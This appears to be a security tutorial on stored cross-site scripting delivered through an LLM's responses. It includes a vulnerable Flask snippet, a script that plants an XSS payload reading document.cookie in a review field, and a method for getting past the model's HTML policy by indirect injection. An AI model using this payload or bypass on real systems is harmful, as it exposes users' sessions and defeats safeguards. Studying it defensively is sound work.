Cross-Site Scripting
Cross-Site Scripting via LLM Responses
Imagine an attacker interacting with an LLM integrated into a web application that displays user-generated content. The attacker's goal is to inject a malicious script through the LLM's response that will be executed when viewed in a web browser.
The attacker starts by crafting a message to the LLM with the intent of getting it to produce a response containing an XSS payload. The application also fails to sanitize user input before rendering it, so any payload that makes it into the page persists as a stored XSS.
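As a rough sketch of the vulnerable pattern, the snippet below shows an endpoint that embeds raw LLM output into HTML without escaping. The route, the `query_llm` helper, and the parameter names are illustrative assumptions, not the target application's real API.

```python
# Minimal sketch of the vulnerable pattern: raw LLM output is interpolated
# into HTML without escaping. query_llm and the /reviews/summary route are
# hypothetical placeholders.
from flask import Flask, request

app = Flask(__name__)

def query_llm(prompt: str) -> str:
    """Placeholder for the real LLM call; returns the model's raw text."""
    raise NotImplementedError

@app.route("/reviews/summary")
def review_summary():
    article_id = request.args.get("article_id", "")
    # The prompt pulls in stored, attacker-controlled review text.
    llm_output = query_llm(f"Summarize the reviews of article {article_id}")
    # Vulnerable: the model's output is embedded in the page as-is, so any
    # <script> tag or event-handler markup it repeats will run in the browser.
    return f"<html><body><div class='summary'>{llm_output}</div></body></html>"
```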

The LLM's policy prevents us from directly asking it to write HTML that the browser will interpret. However, we can bypass this policy indirectly.
Instead of putting the payload in our prompt, we can leave an HTML payload in the review field of an article on the platform and then ask the LLM to read that article's reviews. Because the payload reaches the model indirectly through the stored reviews, the request is not blocked, and the response echoes the payload back into the page, as sketched below.
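The following sketch shows the two steps of the indirect injection. The host, the `/api/reviews` and `/api/chat` endpoints, the article ID, and the payload are all hypothetical stand-ins for the platform's actual interface.

```python
# Sketch of the indirect injection, assuming hypothetical endpoints:
# /api/reviews for posting a review and /api/chat for talking to the LLM.
import requests

BASE_URL = "https://target.example"  # placeholder host

# Step 1: store the payload where the LLM will later read it.
payload = '<img src=x onerror="alert(document.cookie)">'
requests.post(
    f"{BASE_URL}/api/reviews",
    json={"article_id": 42, "review": payload},
)

# Step 2: ask the LLM to read the reviews. The prompt itself contains no
# HTML, so the policy filter sees nothing to block; the payload rides in
# through the stored review and is echoed back in the response.
resp = requests.post(
    f"{BASE_URL}/api/chat",
    json={"message": "Please read me the reviews of article 42."},
)
print(resp.json())
```

If the application then renders that chat response without escaping, the stored payload executes in the victim's browser.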


